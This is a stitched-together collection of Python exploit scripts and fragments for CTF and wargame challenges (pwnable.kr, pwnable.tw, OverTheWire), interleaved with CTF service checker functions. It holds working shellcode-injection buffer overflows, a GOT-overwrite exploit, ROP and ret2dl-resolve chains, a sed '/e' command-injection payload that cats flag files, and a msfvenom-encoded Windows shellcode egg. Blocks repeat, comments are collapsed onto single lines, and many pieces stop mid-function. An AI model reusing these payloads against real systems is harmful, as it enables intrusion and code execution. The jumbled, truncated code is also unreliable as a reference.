def exploit():
try:
vortex4_uid = pwd.getpwnam('vortex4').pw_uid
except KeyError:
raise ExploitFailedError('user vortex4 does not exist')
pwn.context(arch='i386', os='linux')
print 'generating shellcode...',
shellcode = pwn.asm(
pwn.shellcraft.setreuid(vortex4_uid) + pwn.shellcraft.sh())
'''
@[0x80482a4]:
- the virtual address of the (r_offset) field in the dynamic relocation
table entry for glibc's exit()
'''
ptr2exitgotslot = struct.pack("<I", 0x80482a4)
# 132 = sizeof(vulnerable buffer) + sizeof(the pointer named tmp)
expegg = shellcode + '\x41' * (132 - len(shellcode)) + ptr2exitgotslot
print '[done]'
print 'trying to expl0it the vulnerable process'
exit_stat = subprocess.call(['/vortex/vortex3', expegg])
if exit_stat != os.EX_OK:
raise ExploitFailedError(
'failed to exploit the target vulnerable process')
def set_flag(ip, port, flag):
pwn.context(timeout=10)
flag_id = "".join(random.choice(string.ascii_letters) for i in range(30))
token = "".join(random.choice(string.ascii_letters) for i in range(30))
r = pwn.remote(ip, port)
if not r.recvline() == 'Welcome to the NADMOZG translator service!\n':
raise RuntimeError("Wrong banner")
r.send("dict {}\n".format(flag_id))
info = r.recvline()
m = re.match(
"Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n",
info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in token).encode('hex') + '\n')
if not r.recvline() == "Dictionary created\n":
raise RuntimeError("Can't create dictionary")
r.send("add secretik {}\n".format(flag))
if not r.recvline() == "Word saved!\n":
raise RuntimeError("Can't store word")
r.send("quit\n")
if not r.recvall() == "Good bye!\n":
raise RuntimeError("Wrong goodbye")
return {"flag_id": flag_id, "token": token}
def get_flag(ip, port, flag_id, token):
pwn.context(timeout=10)
r = pwn.remote(ip, port)
if not r.recvline() == 'Welcome to the NADMOZG translator service!\n':
raise RuntimeError("Wrong banner")
r.send("dict {}\n".format(flag_id))
info = r.recvline()
m = re.match(
"Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n",
info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in token).encode('hex') + '\n')
if not r.recvline() == 'Password ok!\n':
raise RuntimeError("Can't load dictionary")
if not r.recvline() == 'Dictionary loaded\n':
raise RuntimeError("Can't load dictionary")
r.send("translate secretik\n")
flag = r.recvline().strip()
if not flag != "secretik":
raise RuntimeError("Flag not present or deleted")
r.send("quit\n")
if not r.recvall() == "Good bye!\n":
raise RuntimeError("Wrong goodbye")
return flag
def main():
pwn.context(arch='amd64', os='linux')
mssh = pwn.ssh(host='pwnable.kr', user='******', password='******', port=2222)
attack = mssh.connect_remote('0.0.0.0', 9026)
shellcode = pwn.shellcraft.pushstr('this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong')
shellcode += pwn.shellcraft.open('rsp', 0, 0)
shellcode += pwn.shellcraft.read('rax', 'rsp', 1024)
shellcode += pwn.shellcraft.write(1, 'rsp', 1024)
attack.recvuntil('give me your x64 shellcode: ')
attack.send(pwn.asm(shellcode))
print attack.recvall()
def main():
pwn.context(arch='i386', os='linux', endian='little', word_size=32)
remote = pwn.remote('chall.pwnable.tw', 10001)
remote.recvuntil("Give my your shellcode:")
shellcode = pwn.asm(
pwn.shellcraft.open('/home/orw/flag') +
pwn.shellcraft.read('eax', 'esp', 0x1000) +
pwn.shellcraft.write(1, 'esp', 'eax')
)
assert len(shellcode) <= 0xC8, len(shellcode)
remote.send(shellcode)
print("Flag: %s" % remote.recv().rstrip().decode('utf8'))
remote.close()
def exploit(ip, port, flag_id):
pwn.context(timeout=10)
dict_id = "".join(random.choice(string.ascii_letters) for i in range(30))
word = "".join(random.choice(string.ascii_letters) for i in range(30))
payload = "{} 0a DELIM s/{}/cat {}/e".format("".join(random.choice(string.ascii_letters) for i in range(30)), word, flag_id)
r = pwn.remote(ip, port)
r.recvline()
r.send("dict {}\n".format(dict_id))
info = r.recvline()
m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in payload).encode('hex') + '\n')
r.recvline()
r.send("translate {}\n".format(word))
r.send('quit\n')
r.recvline()
flagline = r.recvline()
flag = re.match("s/secretik/(.*)/gi;", flagline).group(1)
return flag
def exploit(ip, port, flag_id):
pwn.context(timeout=10)
dict_id = "".join(random.choice(string.ascii_letters) for i in range(30))
word = "".join(random.choice(string.ascii_letters) for i in range(30))
payload = "{} 0a DELIM s/{}/cat {}/e".format("".join(random.choice(string.ascii_letters) for i in range(30)), word, flag_id)
r = pwn.remote(ip, port)
r.recvline()
r.send("dict {}\n".format(dict_id))
info = r.recvline()
m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in payload).encode('hex') + '\n')
r.recvline()
r.send("translate {}\n".format(word))
r.send('quit\n')
r.recvline()
flagline = r.recvline()
flag = re.match("s/secretik/(.*)/gi;", flagline).group(1)
return {"FLAG" : flag}
def set_flag(ip, port, flag):
pwn.context(timeout=10)
flag_id = "".join(random.choice(string.ascii_letters) for i in range(30))
token = "".join(random.choice(string.ascii_letters) for i in range(30))
r = pwn.remote(ip, port)
if not r.recvline() == 'Welcome to the NADMOZG translator service!\n':
raise RuntimeError("Wrong banner")
r.send("dict {}\n".format(flag_id))
info = r.recvline()
m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in token).encode('hex') + '\n')
if not r.recvline() == "Dictionary created\n":
raise RuntimeError("Can't create dictionary")
r.send("add secretik {}\n".format(flag))
if not r.recvline() == "Word saved!\n":
raise RuntimeError("Can't store word")
r.send("quit\n")
if not r.recvall() == "Good bye!\n":
raise RuntimeError("Wrong goodbye")
return {"FLAG_ID" : flag_id, "TOKEN" : token}
def get_flag(ip, port, flag_id, token):
pwn.context(timeout=10)
r = pwn.remote(ip, port)
if not r.recvline() == 'Welcome to the NADMOZG translator service!\n':
raise RuntimeError("Wrong banner")
r.send("dict {}\n".format(flag_id))
info = r.recvline()
m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in token).encode('hex') + '\n')
if not r.recvline() == 'Password ok!\n':
raise RuntimeError("Can't load dictionary")
if not r.recvline() == 'Dictionary loaded\n':
raise RuntimeError("Can't load dictionary")
r.send("translate secretik\n")
flag = r.recvline().strip()
if not flag != "secretik":
raise RuntimeError("Flag not present or deleted")
r.send("quit\n")
if not r.recvall() == "Good bye!\n":
raise RuntimeError("Wrong goodbye")
return {"FLAG" : flag}
# Example implementation to produce ROP chain for vulnerable program, # and print 'Hello, world!' # Program is taking input as argument, as has buffer overflow vulneralibity # We are using CTP framework 'pwntools' https://github.com/Gallopsled/pwntools # We are expecting, that ASLR is disabled. Bypassing NX bit from pwn import log, context from pwnlib.tubes.process import process from pwnlib.util.packing import p32, pack from pwnlib.exception import PwnlibException context(arch='i386', os='linux') # NOTE this might vary based on machine libc_entry = 0x00000000 # NOTE that you might have different offsets, depending on libc version # and compiler settings offset_ppr = 0x00000000 # pop/pop/ret gadget offset_pr = 0x00000000 # pop ebx;ret offset_exit = 0x00000000 offset_putchar = 0x00000000 # 0xf7e6740f
# Example implementation to produce ROP chain for vulnerable program, # and print 'Hello, world!' # Program is taking input as argument, as has buffer overflow vulneralibity # We are using CTP framework 'pwntools' https://github.com/Gallopsled/pwntools # We are expecting, that ASLR is disabled. Bypassing NX bit from pwn import log, context from pwnlib.tubes.process import process from pwnlib.util.packing import p32, pack from pwnlib.exception import PwnlibException context(arch='i386', os='linux') # NOTE this might vary based on machine libc_entry = 0x00000000 # NOTE that you might have different offsets, depending on libc version # and compiler settings offset_ppr = 0x00000000 # pop/pop/ret gadget offset_pr = 0x00000000 # pop ebx;ret offset_exit = 0x00000000 offset_putchar = 0x00000000 # 0xf7e6740f def main():
import pwn
pwn.context(os='linux',arch='i386',bits=32)
import re
import struct
cache = {}
pat = re.compile('\$\+[-]?0x[0-9a-f]+')
pat2 = re.compile('[ ]*push [0-9]+[ ]*')
pat3 = re.compile('[ ]*mov eax, (d)?word ptr \[0x[0-9a-f]+\][ ]*')
pat4 = re.compile('[ ]*mov eax, (dword ptr )?\[(?P<register>e[a-z][a-z])( )?[+-]( )?(0x)?[0-9a-f]+\][ ]*')
pat5 = re.compile('(0x[0-9a-f]+|[0-9]+)')
pat6 = re.compile('[ ]*(?P<mnemonic>(add)|(sub)) (?P<register>(esp)|(ebx)),(?P<amount>[0-9]*)[ ]*')
pat7 = re.compile('[ ]*mov eax, word ptr.*')#Match stupid size mismatch
pat8 = re.compile('[ ]*mov eax, .[xip]')#Match ridiculous register mismatch
#jcxz and jecxz are removed because they don't have a large expansion
JCC = ['jo','jno','js','jns','je','jz','jne','jnz','jb','jnae',
'jc','jnb','jae','jnc','jbe','jna','ja','jnbe','jl','jnge','jge',
'jnl','jle','jng','jg','jnle','jp','jpe','jnp','jpo']
#Simple cache code. Called after more complex preprocessing of assembly source.
def _asm(text):
if text in cache:
return cache[text]
else:
with open('uncached.txt','a') as f:
f.write(text+'\n')
code = pwn.asm(text)
cache[text] = code
return code
#!/usr/bin/env python3
import pwn
import os
doing = pwn.term.output(float=True)
if pwn.context.log_level == pwn.logging.INFO:
pwn.context(log_level='ERROR')
pwn.context(arch='i386')
solutions = [ # Entry <i> is the solution to narnia<i>
pwn.flat('A' * 20, 0xdeadbeef),
pwn.asm(pwn.shellcraft.sh()),
pwn.cyclic(200)
]
# Run this python script inside tmux like this:
# $> tmux
# $> ./exploit GDB
# It will spawn a separate window with the GDB session
pwn.context.terminal = ["tmux", "splitw", "-h"]
gdbscript = '''
continue
'''.format(**locals())
def ssh_connect(level_id, level_password):
return pwn.ssh(user='******' % level_id,
password=level_password,
host="narnia.labs.overthewire.org",
#!/usr/bin/env python3
from pwn import context,ELF,process,log
from fastpwn import pack, aslr
if aslr.read():
aslr.write("2")
log.warning("ASLR turned on")
context(arch='amd64',os='linux')
binary=ELF('./sgc',checksec=False)
p=binary.process()
libc=ELF('./libc-2.26.so',checksec=False)
## establish helper functions
def add(n,g,a):
p.recvuntil("Action:")
p.sendline("0")
p.recvuntil("name:")
p.sendline(str(n)) # name
p.recvuntil("group:")
p.sendline(str(g)) # group name
p.recvuntil("age:")
p.sendline(str(a)) # age
def gdis(n):
p.recvuntil("Action:")
p.sendline("1")
p.recvuntil("name:")
p.sendline(str(n)) # name
def udis(i):
p.recvuntil("Action:")
p.sendline("2")
p.recvuntil("index:")
p.sendline(str(i)) # index
def edit(i, n, prop=True):
#!/usr/bin/env python
# encoding: utf-8
#flag{Seize it, control it, and exploit it. Welcome to the House of Storm.}
import itertools
from hashlib import sha256
from pwn import remote, process, ELF
from pwn import context
from pwn import p32,p64,u32,u64
context(arch='amd64', os='linux', log_level='info')
context.terminal = ['tmux', 'splitw', '-h']
r = None
def proof():
chal = r.recvuntil('\n').strip()
print chal
for x in itertools.product(range(0, 0xff), repeat=4):
x = ''.join(map(chr, x))
if sha256(chal+x).digest().startswith('\0\0\0'):
r.send(x)
return
print 'Not Found'
exit()
def alloc(size):
r.sendline('1')
r.recvuntil('Size: ')
assert(12 < size <= 0x1000)
from roputils import *
import pwn
pwn.context(log_level="debug")
fpath = "./info"
offset = 0x16
rop = ROP(fpath)
# print rop.fpath
# p = Proc(rop.fpath)
p = pwn.process(rop.fpath)
# p = pwn.remote("123.206.81.66",8888)
pwn.gdb.attach(p, "b*0x80484DC\nb*0x080484E5\n\nc")
addr_bss = rop.section('.bss') + 0x50
# buf = rop.retfill(offset)
buf = 'a' * offset
buf += rop.call('read', 0, addr_bss, 0x100)
buf += rop.dl_resolve_call(addr_bss + 0x30, addr_bss, 0x0804864B) #
buf += rop.call('fflush', 0x8049844)
buf += (0x7f - len(buf)) * 'a'
buf2 = rop.string("[Result]:0x%X")
# buf2 = p32(0)*12
buf2 += (0x30 - len(buf2)) * 'b'
buf2 += rop.dl_resolve_data(addr_bss + 0x30, 'printf')
buf2 += (0x100 - len(buf2)) * 'a'
p.send(buf + buf2)
p.interactive()
import pwn
pwn.context(os='linux',arch='amd64',word_size=64)
import re
import struct
cache = {}
# Metacache stores data about an assembled instruction.
# Specifically, right now it only holds the offset of the
# displacement value (if the instruction encodes a 4-byte displacement).
# This is only used for efficient modification of
# already-assembled instructions containing a reference to rip.
# This value allows us to change the offset from rip regardless of
# the instruction.
# even if
# there is an immediate value (which appears at the end of an
# encoded instruction's bytes).
metacache = {}
pat = re.compile('\$\+[-]?0x[0-9a-f]+')
pat2 = re.compile('[ ]*push [0-9]+[ ]*')
pat3 = re.compile('[ ]*mov eax, (d)?word ptr \[0x[0-9a-f]+\][ ]*')
pat4 = re.compile('[ ]*mov eax, (dword ptr )?\[(?P<register>e[a-z][a-z])( )?[+-]( )?(0x)?[0-9a-f]+\][ ]*')
pat5 = re.compile('(0x[0-9a-f]+|[0-9]+)')
pat6 = re.compile('[ ]*(?P<mnemonic>(add)|(sub)) (?P<register>(esp)|(ebx)),(?P<amount>[0-9]+)[ ]*')
pat7 = re.compile('[ ]*mov eax, word ptr.*')#Match stupid size mismatch
pat8 = re.compile('[ ]*mov eax, .[xip]')#Match ridiculous register mismatch
rip_with_offset = re.compile(u'\[rip(?: (?P<offset>[\+\-] [0x]?[0-9a-z]+))?\]') #Apparently the hex prefix is optional if the number is...unambiguous?
#jcxz and jecxz are removed because they don't have a large expansion
JCC = ['jo','jno','js','jns','je','jz','jne','jnz','jb','jnae',
'jc','jnb','jae','jnc','jbe','jna','ja','jnbe','jl','jnge','jge',
'jnl','jle','jng','jg','jnle','jp','jpe','jnp','jpo']
def benign(ip, port):
def rand_str():
return ''.join(random.choice(string.ascii_letters) for i in range(30))
pwn.context(timeout=10)
word_cnt = random.randrange(3, 10)
words = []
for i in range(word_cnt):
words.append([rand_str(), rand_str(), rand_str()])
dict_id1 = rand_str()
pwd1 = rand_str()
dict_id2 = rand_str()
pwd2 = rand_str()
str_to_translate = " ".join([x[0] for x in words])
str_after_translate_1 = " ".join([x[1] for x in words])
str_after_translate_2 = " ".join([x[2] for x in words])
str_without_translate = str_to_translate
r = pwn.remote(ip, port)
if not r.recvline() == 'Welcome to the NADMOZG translator service!\n':
raise RuntimeError("Wrong banner")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_without_translate:
raise RuntimeError("Wrong default translation")
r.send("dict {}\n".format(dict_id1))
info = r.recvline()
m = re.match(
"Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n",
info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in pwd1).encode('hex') + '\n')
if not r.recvline() == "Dictionary created\n":
raise RuntimeError("Can't create dictionary 1")
for (word_from, word_to1, word_to2) in words:
r.send("add {} {}\n".format(word_from, word_to1))
if not r.recvline() == "Word saved!\n":
raise RuntimeError("Can't store word")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_after_translate_1:
raise RuntimeError("Wrong translation after adding words")
r.send("dict {}\n".format(dict_id2))
info = r.recvline()
m = re.match(
"Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n",
info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in pwd2).encode('hex') + '\n')
if not r.recvline() == "Dictionary created\n":
raise RuntimeError("Can't create dictionary 2")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_without_translate:
raise RuntimeError("Wrong translation after switching dictionaries")
for (word_from, word_to1, word_to2) in words:
r.send("add {} {}\n".format(word_from, word_to2))
if not r.recvline() == "Word saved!\n":
raise RuntimeError("Can't store word")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_after_translate_2:
raise RuntimeError(
"Wrong translation after adding words to another dictionary")
r.send("quit\n")
if not r.recvall() == "Good bye!\n":
raise RuntimeError("Wrong goodbye")
r = pwn.remote(ip, port)
if not r.recvline() == 'Welcome to the NADMOZG translator service!\n':
raise RuntimeError("Wrong banner")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_without_translate:
raise RuntimeError(
"Wrong default translation after words added to another dictionary"
)
r.send("dict {}\n".format(dict_id1))
info = r.recvline()
m = re.match(
"Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n",
info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in pwd2).encode('hex') + '\n')
if not r.recvline() == "Dictionary exists and password doesn't match\n":
raise RuntimeError("Wrong message after wrong password")
if not r.recvline() == "Dictionary not loaded\n":
raise RuntimeError("Wrong message after wrong password")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_without_translate:
raise RuntimeError("Wrong translation after wrong password attempt")
r.send("dict {}\n".format(dict_id1))
info = r.recvline()
m = re.match(
"Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n",
info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(pwd1 + 'XXX\n')
if not r.recvline() == 'Please input only hexadecimal characters\n':
raise RuntimeError("Wrong message after invalid password")
if not r.recvline() == "Dictionary not loaded\n":
raise RuntimeError("Wrong message after invalid password")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_without_translate:
raise RuntimeError("Wrong translation after invalid password attempt")
r.send("dict {}\n".format(dict_id1))
info = r.recvline()
m = re.match(
"Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n",
info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in pwd1).encode('hex') + '\n')
if not r.recvline() == 'Password ok!\n':
raise RuntimeError("Can't load dictionary")
if not r.recvline() == 'Dictionary loaded\n':
raise RuntimeError("Can't load dictionary")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_after_translate_1:
raise RuntimeError("Wrong translation after loading stored dictionary")
r.send("dict {}\n".format(dict_id2))
info = r.recvline()
m = re.match(
"Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n",
info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in pwd2).encode('hex') + '\n')
if not r.recvline() == 'Password ok!\n':
raise RuntimeError("Can't load dictionary")
if not r.recvline() == 'Dictionary loaded\n':
raise RuntimeError("Can't load dictionary")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_after_translate_2:
raise RuntimeError("Wrong translation after loading stored dictionary")
r.send("quit\n")
if not r.recvall() == "Good bye!\n":
raise RuntimeError("Wrong goodbye")
#!/usr/bin/env python3
from pwn import process, ELF, log, context, pause
from fastpwn import pack
context(arch='amd64', os='linux', log_level='DEBUG')
binary = ELF('./lab')
p = binary.process()
offset = 112
#### define sections of the binary
# since PIE is not enabled, these will be static offsets to whichever section we want
# we will not pack them, since after they are in bytes we cannot use as decimal offsets :(
bss = 0x0804c028
plt = 0x08049030
rel_plt = 0x08048424
dynsym = 0x08048260
dynstr = 0x08048320
#### Important entries within PLT/GOT
got_read = 0x0804c010
plt_read = 0x08049050
log.info("")
log.warning("continue?")
log.info("")
pause()
log.info(".bss: \t%s" % hex(bss))
log.info(".plt: \t%s" % hex(plt))
log.info(".rel.plt: %s" % hex(rel_plt))
log.info(".dynsym: %s" % hex(dynsym))
log.info(".dynstr: %s" % hex(dynstr))
log.info("GOT entry to read: %s" % hex(got_read))
log.info("PLT entry to read: %s" % hex(plt_read))
stack = 0x300
def main():
pwn.context(arch='i386', os='linux', endian='little', word_size=32)
remote = pwn.remote('chall.pwnable.tw', 10000)
remote.recvuntil("Let's start the CTF:")
# first_attempt(remote)
third_attempt(remote)
#!/usr/bin/env python3
import pwn
pwn.context(arch="i386", os="linux")
PAYLOAD = pwn.flat('A' * (44 + 4 + 4), 0xcafebabe, '\n')
r = pwn.remote("pwnable.kr", 9000)
r.send(PAYLOAD)
r.interactive()
#!/usr/bin/env python
# encoding: utf-8
from pwn import remote, process, ELF
from pwn import context
from pwn import p8, p16, p32, p64, u32, u64, asm
context(arch='amd64', os='linux', log_level='debug', endian='big')
r = None
def set_slider(num):
r.sendline('set %d' % num)
r.recvuntil('>')
def set_dial(flavor):
r.sendline('set %s' % flavor)
r.recvuntil('>')
def press():
r.sendline('press')
r.recvuntil('>')
def drink(soda):
r.sendline('drink %s' % soda)
r.recvuntil('>')
import pwn
pwn.context(os='linux',arch='i386')
import re
import struct
cache = {}
pat = re.compile('\$\+[-]?0x[0-9a-f]+')
pat2 = re.compile('[ ]*push [0-9]+[ ]*')
pat3 = re.compile('[ ]*mov eax, (d)?word ptr \[0x[0-9a-f]+\][ ]*')
pat4 = re.compile('[ ]*mov eax, (dword ptr )?\[(?P<register>e[a-z][a-z])( )?[+-]( )?(0x)?[0-9a-f]+\][ ]*')
pat5 = re.compile('(0x[0-9a-f]+|[0-9]+)')
pat6 = re.compile('[ ]*(?P<mnemonic>(add)|(sub)) (?P<register>(esp)|(ebx)),(?P<amount>[0-9]*)[ ]*')
pat7 = re.compile('[ ]*mov eax, word ptr.*')#Match stupid size mismatch
pat8 = re.compile('[ ]*mov eax, .[xip]')#Match ridiculous register mismatch
#jcxz and jecxz are removed because they don't have a large expansion
JCC = ['jo','jno','js','jns','je','jz','jne','jnz','jb','jnae',
'jc','jnb','jae','jnc','jbe','jna','ja','jnbe','jl','jnge','jge',
'jnl','jle','jng','jg','jnle','jp','jpe','jnp','jpo']
#Simple cache code. Called after more complex preprocessing of assembly source.
def _asm(text):
if text in cache:
return cache[text]
else:
with open('uncached.txt','a') as f:
f.write(text+'\n')
code = pwn.asm(text)
cache[text] = code
return code
from roputils import *
import pwn
pwn.context(log_level="debug")
fpath = "./info"
offset = 0x16
rop = ROP(fpath)
# print rop.fpath
# p = Proc(rop.fpath)
p = pwn.process(rop.fpath)
# p = pwn.remote("123.206.81.66",8888)
pwn.gdb.attach(p,"b*0x80484DC\nb*0x080484E5\n\nc")
addr_bss = rop.section('.bss')+0x50
# buf = rop.retfill(offset)
buf = 'a'*offset
buf += rop.call('read', 0, addr_bss, 0x100)
buf += rop.dl_resolve_call(addr_bss+0x30, addr_bss,0x0804864B)#
buf += rop.call('fflush', 0x8049844)
buf += (0x7f-len(buf))*'a'
buf2 = rop.string("[Result]:0x%X")
# buf2 = p32(0)*12
buf2 += (0x30-len(buf2))*'b'
buf2 += rop.dl_resolve_data(addr_bss+0x30, 'printf')
buf2 += (0x100-len(buf2))*'a'
p.send(buf+buf2)
#!/usr/bin/env python
from helper import *
from pwn import asm, context
context(arch='i386')
# payload = pattern_create(3000)
# msfvenom -p windows/exec CMD=calc --arch x86 --platform windows -e x86/alpha_mixed -f python -v egg
# Found 1 compatible encoders
# Attempting to encode payload with 1 iterations of x86/alpha_mixed
# x86/alpha_mixed succeeded with size 440 (iteration=0)
# x86/alpha_mixed chosen with final size 440
# Payload size: 440 bytes
# Final size of python file: 2145 bytes
egg = "w00t" # single tag for missing space
egg += asm('nop')
egg += asm('and esp, 0xfffffff0') # align stack
egg += "\x89\xe0\xd9\xcb\xd9\x70\xf4\x5e\x56\x59\x49\x49\x49"
egg += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
egg += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
egg += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
egg += "\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c\x4b\x58\x6d"
egg += "\x52\x55\x50\x55\x50\x35\x50\x63\x50\x6e\x69\x69\x75"
egg += "\x74\x71\x4f\x30\x53\x54\x6c\x4b\x56\x30\x54\x70\x4c"
egg += "\x4b\x52\x72\x34\x4c\x4c\x4b\x71\x42\x42\x34\x4e\x6b"
egg += "\x63\x42\x66\x48\x56\x6f\x4f\x47\x32\x6a\x67\x56\x64"
egg += "\x71\x39\x6f\x4e\x4c\x57\x4c\x65\x31\x33\x4c\x75\x52"
egg += "\x36\x4c\x47\x50\x69\x51\x5a\x6f\x74\x4d\x45\x51\x39"
egg += "\x57\x6b\x52\x6a\x52\x42\x72\x71\x47\x6c\x4b\x42\x72"
egg += "\x74\x50\x4e\x6b\x31\x5a\x57\x4c\x4c\x4b\x72\x6c\x72"
def benign(ip, port):
def rand_str():
return ''.join(random.choice(string.ascii_letters) for i in range(30))
pwn.context(timeout=10)
word_cnt = random.randrange(3, 10)
words = []
for i in range(word_cnt):
words.append([rand_str(), rand_str(), rand_str()])
dict_id1 = rand_str()
pwd1 = rand_str()
dict_id2 = rand_str()
pwd2 = rand_str()
str_to_translate = " ".join([x[0] for x in words])
str_after_translate_1 = " ".join([x[1] for x in words])
str_after_translate_2 = " ".join([x[2] for x in words])
str_without_translate = str_to_translate
r = pwn.remote(ip, port)
if not r.recvline() == 'Welcome to the NADMOZG translator service!\n':
raise RuntimeError("Wrong banner")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_without_translate:
raise RuntimeError("Wrong default translation")
r.send("dict {}\n".format(dict_id1))
info = r.recvline()
m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in pwd1).encode('hex') + '\n')
if not r.recvline() == "Dictionary created\n":
raise RuntimeError("Can't create dictionary 1")
for (word_from, word_to1, word_to2) in words:
r.send("add {} {}\n".format(word_from, word_to1))
if not r.recvline() == "Word saved!\n":
raise RuntimeError("Can't store word")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_after_translate_1:
raise RuntimeError("Wrong translation after adding words")
r.send("dict {}\n".format(dict_id2))
info = r.recvline()
m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in pwd2).encode('hex') + '\n')
if not r.recvline() == "Dictionary created\n":
raise RuntimeError("Can't create dictionary 2")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_without_translate:
raise RuntimeError("Wrong translation after switching dictionaries")
for (word_from, word_to1, word_to2) in words:
r.send("add {} {}\n".format(word_from, word_to2))
if not r.recvline() == "Word saved!\n":
raise RuntimeError("Can't store word")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_after_translate_2:
raise RuntimeError("Wrong translation after adding words to another dictionary")
r.send("quit\n")
if not r.recvall() == "Good bye!\n":
raise RuntimeError("Wrong goodbye")
r = pwn.remote(ip, port)
if not r.recvline() == 'Welcome to the NADMOZG translator service!\n':
raise RuntimeError("Wrong banner")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_without_translate:
raise RuntimeError("Wrong default translation after words added to another dictionary")
r.send("dict {}\n".format(dict_id1))
info = r.recvline()
m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in pwd2).encode('hex') + '\n')
if not r.recvline() == "Dictionary exists and password doesn't match\n":
raise RuntimeError("Wrong message after wrong password")
if not r.recvline() == "Dictionary not loaded\n":
raise RuntimeError("Wrong message after wrong password")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_without_translate:
raise RuntimeError("Wrong translation after wrong password attempt")
r.send("dict {}\n".format(dict_id1))
info = r.recvline()
m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(pwd1 + 'XXX\n')
if not r.recvline() == 'Please input only hexadecimal characters\n':
raise RuntimeError("Wrong message after invalid password")
if not r.recvline() == "Dictionary not loaded\n":
raise RuntimeError("Wrong message after invalid password")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_without_translate:
raise RuntimeError("Wrong translation after invalid password attempt")
r.send("dict {}\n".format(dict_id1))
info = r.recvline()
m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in pwd1).encode('hex') + '\n')
if not r.recvline() == 'Password ok!\n':
raise RuntimeError("Can't load dictionary")
if not r.recvline() == 'Dictionary loaded\n':
raise RuntimeError("Can't load dictionary")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_after_translate_1:
raise RuntimeError("Wrong translation after loading stored dictionary")
r.send("dict {}\n".format(dict_id2))
info = r.recvline()
